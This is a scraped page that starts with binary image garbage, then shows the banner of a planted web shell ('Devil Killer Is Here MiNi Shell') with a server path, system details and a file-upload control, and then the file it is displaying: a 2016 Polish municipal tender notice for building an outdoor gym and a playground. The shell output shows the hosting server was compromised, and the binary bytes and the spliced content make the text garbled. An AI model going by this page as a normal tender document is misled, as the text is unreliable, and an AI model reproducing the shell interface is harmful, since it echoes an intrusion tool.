JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160504/48967-N-2016.html

<p class="kh_header"><b>Strzelce Krajeńskie: Budowa profesjonalnej siłowni na świeżym powietrzu 
w Wielisławiach gmina Strzelce Krajeńskie - zadanie I

Budowa placu zabawowo - sportowego w Gardzku gmina Strzelce Krajeńskie - zadanie II</b><br>
<b>Numer ogłoszenia: 48967 - 2016; data zamieszczenia: 04.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzelce Krajeńskie , Al. Wolności 48, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7631130 w. 235, faks 095 7633294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzelce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa profesjonalnej siłowni na świeżym powietrzu 
w Wielisławiach gmina Strzelce Krajeńskie - zadanie I

Budowa placu zabawowo - sportowego w Gardzku gmina Strzelce Krajeńskie - zadanie II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Budowa profesjonalnej siłowni na świeżym powietrzu  w Wielisławiach gmina Strzelce Krajeńskie - zadanie I
Budowa placu zabawowo - sportowego w Gardzku gmina Strzelce Krajeńskie - zadanie II
Szczegółowy zakres robót zawiera: 
- Projekt budowlany,
- przedmiar robót,
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych,
Dokumenty powyższe są załącznikami do niniejszej Specyfikacji Istotnych Warunków Zamówienia.

Roboty należy wykonać zgodnie z Projektami budowlanymi, Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych, Przedmiarami Robót. 

Materiały użyte do realizacji zadania muszą posiadać aprobaty techniczne, odpowiadać Polskim Normom przenoszącym europejskie normy zharmonizowane - art. 30 ust.2 ustawy - prawo zamówień publicznych - stosuje się odpowiednio oraz wymogom określonym                         w Specyfikacji Istotnych Warunków Zamówienia.

Wyceny robót należy dokonać zgodnie z specyfikacją istotnych warunków zamówienia oraz z załączoną dokumentacją projektową tj. : Projektem Zgłoszenia Robót Budowlanych, Specyfikacją Techniczną Wykonania i Odbioru Robót  natomiast przedmiar robót należy traktować pomocniczo. 
Wszystkie prace nie ujęte w dokumentacji i przedmiarze, a niezbędne do wykonania zadania należy wykonać. Zaleca się wykonawcom bardzo szczegółowe sprawdzenie w terenie warunków wykonania zamówienia. Wykonawca ma prawo do inspekcji i oceny terenu przyszłych robót i otoczenia przed złożeniem oferty.

W związku z zapewnieniem użytkownikom, placów rekreacyjno - zabawowych, maksimum bezpieczeństwa wszystkie urządzenia wbudowane na placu wymagają posiadania certyfikatu bezpieczeństwa. Zamawiający szczegółowo opisał w Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru Robót dane techniczne wymagane. Zamawiający wskazał elementy poszczególnych urządzeń oraz ich wygląd, które będą bezwzględnie wymagane. Zamawiający wskazał w opisie technicznym oraz Szczegółowych Specyfikacjach Technicznych materiały z których mogą być wykonane elementy urządzeń    i będzie bezwzględnie wymagał wykonania urządzeń z takich materiałów. 

Wykonawca zobowiązany będzie przy odbiorze końcowym do przedłożenia dla urządzeń niżej wymienionych dokumentów:

Certyfikaty i atesty na urządzenia zabawowe lub ich elementy - czyli dokumenty wystawione przez odpowiednie instytucje atestujące i certyfikujące zaświadczające o spełnieniu wymagań jakościowych oraz bezpieczeństwa. Urządzenia przeznaczone na place zabaw i siłownie powinny posiadać certyfikaty zgodności z normą PN-EN 1176 2009r., natomiast nawierzchnia przeznaczona na plac zabaw podlega pod normę PN-EN 1177 2009r. Wykonawca  powinien dostarczyć certyfikat na całe urządzenie zabawowe.  Jeśli urządzenie nie posiada certyfikatu, gdyż nie jest to obowiązkowe, wykonawca powinien zapewnić  o zgodności wyrobu z normą.

Dane techniczne urządzeń - wykonawca powinien zapewnić dokładną specyfikację techniczną dla każdego z urządzenia. W specyfikacji powinny być zawarte takie informacje jak: materiały użyte do produkcji i budowy placu zabaw, wymiary urządzeń, elementy składowe urządzeń, sposób instalacji urządzeń, wymagania odnośnie nawierzchni, zabezpieczenia. Dodatkowo powinna być określona strefa funkcjonowania placu oraz krytyczna wysokość upadku z urządzeń.

Instrukcja instalowania, demontażu urządzeń na placu - nawet w przypadkach, gdy Wykonawca instaluje urządzenia na placu ma obowiązek dostarczyć instrukcję instalowania tych urządzeń. W instrukcji powinna być określona przestrzeń montażowa oraz użytkowania urządzeń oraz szczegółowe wymagania dotyczące instalacji.

Instrukcja użytkowania urządzeń na placu - Wykonawca powinien zapewnić instrukcję w jaki sposób prawidłowo użytkować urządzenia. Każde urządzenie znajdujące się na placu jest przeznaczone dla określonej liczby użytkowników w określonym wieku i te informacje powinny się znaleźć w ww. instrukcji.

Instrukcja kontroli i konserwacji urządzeń zabawowych na placu- Wykonawca powinien określić rodzaj przeprowadzania kontroli urządzeń w celu zminimalizowania zagrożeń (jest to również określone w normie dotyczącej placów).  Instrukcja dotycząca konserwacji ma na celu przedstawienie informacji jak odpowiednio zadbać o urządzenia ich stan techniczny, jak odpowiednio zabezpieczyć je przed korozją. Powinny być również zawarte informacje jak postępować z uszkodzonym placem. Wykonawca zobowiązany jest do założenia karty użytkowania  każdego urządzenia.

Dostępność części zapasowych - place posiadają wiele elementów, które zużywają się wraz z upływem czasu wskutek naturalnej eksploatacji. Elementy te trzeba z czasem wymienić na nowe identyczne lub o identycznych właściwościach. Wykonawca powinien zapewnić dostęp do odpowiednich części zapasowych oraz w miarę potrzeby dokonać wymiany w okresie gwarancji i rękojmi.

Karty gwarancyjne na urządzenia.
Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i urządzeń nowych, w gatunku I, gwarantujących najwyższą jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w specyfikacji technicznej, projekcie budowlanym i opisie technicznym. Występujące w opracowaniach nazwy, typy i pochodzenie produktów nie są dla Wykonawców wiążące. Podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U.  z 2013r., poz.907, 984, 1047 ze zmianami), a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Wykonawca może złożyć ofertę z rozwiązaniem równoważnym, która przedstawia przedmiot zamówienia o cechach odpowiadających cechom lub lepszych od cech wskazanych w opisie przedmiotu zamówienia, lecz oznaczonych innym znakiem towarowym np. wykonawca może zaoferować urządzenia o parametrach równych lub  lepszych niż wskazane przez zamawiającego.

Wszelkie nazwy własne użyte w treści SIWZ i załączników należy czytać jako parametry techniczne i jakościowe materiałów oraz czytać je jako takie lub równoważne. Zgodnie z art. 30 ust. 4 zamawiający dopuszcza rozwiązania równoważne opisanym treścią siwz. W myśl art. 30 ust. 5 wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego roboty budowlane (w tym materiały                        i urządzenia) spełniają wymagania określone przez zamawiającego w opisie przedmiotu zamówienia. Za równoważne zamawiający uzna roboty budowlane (w tym materiały i urządzenia) o paramentach technicznych  i jakościowych nie gorszych niż określone w treści STWiOR oraz dokumentacji projektowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.11.27.20-8, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla zadania I i dla zadania II

10.1 Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.000,00 zł  (dwa tysiące złotych). 
10.2 Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub  kilku następujących formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu, przelewem na rachunek bankowy:
49 8362 0005 0399 1819 2000 0020 w  Banku: Lubusko - Wielkopolski Bank Spółdzielczy. 
b)	poręczeniach bankowych;
c)	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d)	gwarancjach bankowych;
e)	gwarancjach ubezpieczeniowych;
 f)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275).
10.3 Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. W przypadku wniesienia wadium w formie poręczeń lub gwarancji, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
10.4 Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt 9.2.) rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert.
10.5  Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy PZP.
10.6 Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
10.7 Wykonawca, którego oferta zostanie wybrana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
10.8 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (wzór zał. nr 2)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednego zamówienia, którego przedmiotem była budowa co najmniej 1 placu zabaw lub co najmniej jednego placu rekreacyjno - zabawowego z załączeniem dokumentów potwierdzających, że robota została wykonana zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończona.
Wykaz robót należy załączyć do oferty według wzoru stanowiącego Formularz nr 4 do siwz.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach, wskazanych w pkt 5 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (wzór zał. nr 2)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje:

a)  kierownikiem/kierownikami budów - osobami zdolnymi do wykonania zamówienia, tj. dysponowanie minimum jedną osobą posiadającą uprawnienia niezbędne do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej bez ograniczeń z minimum 5-cio letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi zgodnie                 z zgodnie z  Rozporządzeniem Ministra Transportu  i Budownictwa z dnia 28 kwietnia 2006r.                          w sprawie samodzielnych funkcji technicznych  w budownictwie lub odpowiadające im ważne uprawnienia budowlane w zakresie kierowania robotami budowlanymi wydane na podstawie wcześniej obowiązujących przepisów; z przynależnością do właściwej terytorialnie Izby Inżynierów Budownictwa. 
Wykaz personelu należy załączyć do oferty według wzoru stanowiącego Formularz nr 5 do siwz.

Za uprawnienia równoważne zamawiający uzna uprawnienia budowlane zdobyte na podstawie wcześniej obowiązujących przepisów oraz uznane na zasadach określonych w ustawie o zasadach kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394), których zakres uprawnia do pełnienia wskazanej funkcji przy realizacji przedmiotu zamówienia.  

Przedstawiony powyżej skład personelu należy traktować, jako niezbędne minimum, jeżeli                w ocenie Wykonawcy wymagany przez Zamawiającego zespół jest niewystarczający do rzetelnej realizacji niniejszego zamówienia, Wykonawca powinien zatrudnić dodatkowe osoby, a koszty ich utrzymania należy uwzględnić w składanej ofercie. Zamawiający nie będzie ponosił żadnych dodatkowych kosztów  z tego tytułu.
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia i kwalifikacje, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą jak 100.000,00 zł (sto tysięcy złotych).

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach, wskazanych w pkt 5 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy o treści zgodnej z określoną we wzorze stanowiącym Załącznik Nr 1 do SIWZ. 2. Zobowiązanie podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby - wg wzoru określonego w załączniku nr 7 (dokument ten składa podmiot oddający do dyspozycji Wykonawcy niezbędne zasoby). 3. Pełnomocnictwa do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii dokumentów składanych wraz z ofertą. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej notarialnie. 4. Uzasadnienia Wykonawcy, że informacje wskazane w załączniku nr 1 do SIWZ (Wzór formularza ofertowego), stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy określający warunki na jakich zawarta zostanie umowa w sprawie zamówienia publicznego stanowi - Załącznik nr 8
Najważniejsze postanowienia umowy zawiera załącznik 7 - wzór umowy. Wszelkie zmiany umowy mogą zostać wprowadzone wyłącznie w zakresie i w trybach określonych                    w niniejszej siwz oraz warunkach umowy.
Zamawiający przewiduje możliwość dokonania następujących zmian umowy:
Dopuszcza się wydłużenie terminu realizacji niniejszej umowy lub jej części. Zmiana terminu dopuszczalna jest wyłącznie z przyczyn: zmiana w dokumentacji projektowej dokonana przez Zamawiającego, błędy projektowe, niekorzystne warunki geologiczne, których nie można było przewidzieć przed zawarciem umowy, konieczności wstrzymania prac ze względu na znaleziska archeologiczne, wystąpienia w czasie realizacji i na terenie objętym czynnościami wykonawcy robót klęski żywiołowej lub niekorzystnych warunków pogodowych  z wyłączeniem okresu zimowego, zmian w zasadach finansowania zamówienia. W przypadku wystąpienia niniejszych przesłanek termin realizacji wydłuża się maksymalnie o czas na jaki roboty zostały wstrzymane roboty.  
Zmiana terminu dopuszczalna będzie również w przypadku wystąpienia sprzeciwu ze strony właściciela gruntów do czasu rozstrzygnięcia.
Zamawiający dopuszcza konieczność wprowadzenia zmian wynikających ze zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego oraz zmiany wynagrodzenia brutto w przypadku zmiany stawki podatku od towarów i usług. 
Dopuszcza się zmianę osób stanowiących kluczowy personel Wykonawcy. Zmiana może nastąpić na wniosek Wykonawcy, zawierający uzasadnienie zmiany oraz dokumenty potwierdzające, iż wskazana osoba spełnia warunki udziału w postępowaniu, w ramach którego Wykonawcy udzielono niniejszego zamówienia.
